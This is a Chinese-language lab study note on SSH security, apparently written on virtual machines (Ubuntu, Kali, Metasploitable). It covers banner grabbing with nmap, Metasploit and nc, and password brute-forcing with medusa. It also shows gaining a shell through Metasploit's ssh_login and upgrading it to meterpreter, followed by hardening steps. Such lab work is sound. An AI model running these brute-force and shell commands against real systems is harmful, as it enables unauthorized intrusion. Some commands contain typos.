SSH相关安全
ip地址
ubuntu 192.168.10.134
kali 192.168.10.129
metasploitable 192.168.10.133
SSH环境搭建
1.虚拟机安装ubuntu。(安装后一定要换源)
先更新 sudo apt-get update
然后安装net-tools(sudo apt-get install net-tools)
安装ssh
sudo apt-get install openssh-server
2.SSH服务的启动关闭(每次都要输入密码)
service ssh start 启动
sercive ssh status 当前状态
service ssh stop 停止
service ssh restart 重启
3.putty连接
(正在写这一条,电脑崩溃了,ubuntu忘记快照了,东西全丢了,幸亏安装的东西不多)
在ubuntusoftware中搜索 putty ssh client,安装后,只要输入ip地址就可
SSHBanner信息获取
1.nmap -Sv -p 22 192.168.10.134
2.metasploit
msfconsole
use auxilitary/scanner/ssh/ssh_version
show options
set rhosts 192.168.10.134
run
3.nc
nc 192.168.10.134 22
如何规避Banner信息获取
root权限中
cd /etc/ssh
gedit sshd_config
增加这么一句话
DebianBanner no
然后尝试nc,发现没有Banner信息
SSH弱口令**利用
1.medusa
medusa -h 192168.10.134 -u 用户名 -P 密码字典的路径 -M ssh
SSH命令行工具登陆
ssh [email protected] 然后输入密码即可
metasploit利用ssh登陆反弹shell(metasploit会自动建立Bash shell)
msfconsole
use auxilitary/scanner/ssh/ssh_login
show options
set rhosts
set password
set username
run
session -l
session -i 1
利用metasploit获取meterpreter shell(meterpreter功能更加强大)
sessions -u id
SSH安全防御
1.在sshd_config中修改默认端口(修改完要重启)
2.设置PGP登陆
(使用公钥与私钥进行验证)
在window上生成SSH**后,把key里的内容存储到linux的 .ssh 目录下,并重命名为authorized_keys
然后再windows端登陆,把生成的private.ppk导入。
记得要点 save private key
然后导入